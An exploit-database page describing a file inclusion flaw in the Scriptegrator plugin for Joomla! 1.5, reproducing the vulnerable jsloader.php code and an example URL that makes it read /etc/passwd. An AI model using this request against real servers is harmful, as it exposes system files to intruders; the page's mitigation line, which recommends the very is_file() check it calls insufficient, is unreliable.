header-logo
Suggest Exploit
vendor:
Scriptegrator plugin for Joomla! 1.5
by:
S2 Crew [Hungary]
7,5
CVSS
HIGH
File Inclusion
98
CWE
Product Name: Scriptegrator plugin for Joomla! 1.5
Affected Version From: Joomla! 1.5
Affected Version To: Joomla! 1.5
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian Linux, Apache, Joomla! 1.5
N/A

Core Design Scriptegrator plugin for Joomla! 1.5 file inclusion

There's a file called jsloader.php which takes an array of file names from the HTTP GET parameters and calls include() on every one of them. The problem is that the only protection is the is_file() call (therefore it cannot be used for remote file inclusion), so it's trivial to exploit this vulnerability to execute the PHP interpreter on any file on the target system the httpd user can read.

Mitigation:

Ensure that the is_file() call is used to check for the existence of the file before including it.
Source

Exploit-DB raw data:

# Exploit Title: Core Design Scriptegrator plugin for Joomla! 1.5 file inclusion
# Author: S2 Crew [Hungary]
# Tested on: Debian Linux, Apache, Joomla! 1.5

# Code:

There's a file called jsloader.php which takes an array of file names
from the HTTP GET parameters and calls include() on every one of them.

-----------------8<-----------------------------------------------
<?php
/**
 * Core Design Scriptegrator plugin for Joomla! 1.5
 */

define('DS', DIRECTORY_SEPARATOR);
$dir = dirname(__FILE__);

$files = array();
if (isset($_GET['files']) && $_GET['files']) $files = $_GET['files'];

if (extension_loaded('zlib') && !ini_get('zlib.output_compression')) @ob_start('ob_gzhandler');

header("Content-type: application/x-javascript");
header('Cache-Control: must-revalidate');
header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 86400) . ' GMT');

foreach ($files as $file) {
        if (is_file($file)) {
                include($file);
                echo "\n";
        }
}
?>
-----------------8<-----------------------------------------------

The problem is that the only protection is the is_file() call (therefore it cannot
be used for remote file inclusion), so it's trivial to exploit this vulnerability to
execute the PHP interpreter on any file on the target system the httpd user can read.

Example:
http://server/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd

Navigation

Suggest Exploit

Services By CQR